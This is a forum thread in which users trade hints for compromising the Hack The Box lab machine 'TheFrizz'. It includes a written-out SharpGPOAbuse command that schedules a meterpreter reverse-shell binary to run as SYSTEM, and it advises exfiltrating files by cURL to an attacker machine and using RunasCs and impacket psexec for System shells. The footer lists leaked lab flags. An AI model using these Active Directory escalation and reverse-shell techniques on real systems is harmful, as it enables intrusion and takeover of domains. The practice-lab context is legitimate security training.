Mar 20, 2025, 03:07 AM
guys i was just wondering how do you all got schoolbus password i found the 7z files but i couldn't neither download them nor decompress them
|
TheFrizz Hack the Box Season 7 (Windows Medium)
by RedBlock - Saturday March 15, 2025 at 03:36 PM
|
|
Mar 20, 2025, 03:07 AM
guys i was just wondering how do you all got schoolbus password i found the 7z files but i couldn't neither download them nor decompress them
Mar 20, 2025, 03:17 AM
Thanks for the help! I managed to get everything up to the final root part. How many more attempts do we need to make?
I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers. I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin. Has someone already tried this? No success on my side, but don't know why...
Mar 20, 2025, 02:27 PM
(Mar 20, 2025, 10:29 AM)FHP Wrote: I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box. One possible way is to schedule a task instead of adding the user as admin, for example, execute a take as "Administrator" that execute a meterpreter rev shell binary: .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c C:\Windows\Temp\meterpreter.exe" --GPOName "New GPO" --ForceThis will open a meterpreter session in your local machine as NT AUTHORITY/SYSTEM. Same can be done with another rev shell (Mar 20, 2025, 03:07 AM)CYRUS_flame Wrote: guys i was just wondering how do you all got schoolbus password i found the 7z files but i couldn't neither download them nor decompress them I exfiltrated them via cURL to my attacker machine. Highly recommend moving them elsewhere on the box (I created C:\temp for my own purposes) and renaming the files as the $ is interpreted by the CLI as a variable name. Use the uploadserver python tool to recieve it on the attacker machine. (Mar 20, 2025, 10:29 AM)FHP Wrote: I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box. Definitely breaks SSH if you disconnect after the attack is finished, but you can a) use RunasCs as schoolbus to execute whatever you need with elevated permissions (like throwing yourself a reverse shell) or, what I did, is use the credentials to authenticate impacket's psexec module with the cmd option to get a System shell.
Mar 20, 2025, 03:36 PM
(Mar 15, 2025, 08:35 PM)Globules Wrote: Can someone tell me how this exploit was found from the USD advisory? Like how the payload was made? 'gibbonPersonID' isn't mentioned at all in it.
Mar 20, 2025, 04:59 PM
(Mar 20, 2025, 02:27 PM)jackpinto37 Wrote:(Mar 20, 2025, 10:29 AM)FHP Wrote: I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box. Thanks! This is what I have tried many times without success... Until I realized that I was using Class_Frizz OU instead of Domain Controlers! I guess it would have required v.frizzle to be logged in to execute the task.
Mar 20, 2025, 06:09 PM
(Mar 20, 2025, 12:42 AM)bobthebuilder1111 Wrote:(Mar 19, 2025, 10:50 PM)bkbk Wrote: Can someone confirm if RunasCS works? I am not able to add myself in the local admins group with GPO That fixed it for me... I was using a premade version of the exes at first, and when it didn't work I cloned the git and compiled my own, which still wasn't working... Downloaded the links you posted and it worked with no issue, so the problem must've been how I compiled them. Thanks for the links.
Mar 20, 2025, 06:55 PM
(Mar 16, 2025, 06:16 PM)eyalzaba Wrote:(Mar 16, 2025, 05:44 PM)Adith19051905 Wrote:(Mar 16, 2025, 12:44 AM)nguyenhobbes2002 Wrote: krb5.conf Jesus H ... been on this for days... finally got the ssh connection! Thanks a bunch !!
Mar 21, 2025, 08:38 AM
(Mar 20, 2025, 03:36 PM)PangPang Wrote:(Mar 15, 2025, 08:35 PM)Globules Wrote: usd-2023-0025 - usd HeroLab its metioned here with a link to Github |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,422 |
16 minutes ago Last Post: op334 |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 357 |
45 minutes ago Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 91,779 |
7 hours ago Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,208 |
Today, 06:39 AM Last Post: Usercomplex |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 86 | 7,788 |
Yesterday, 11:39 PM Last Post: my4ri0d0 |
||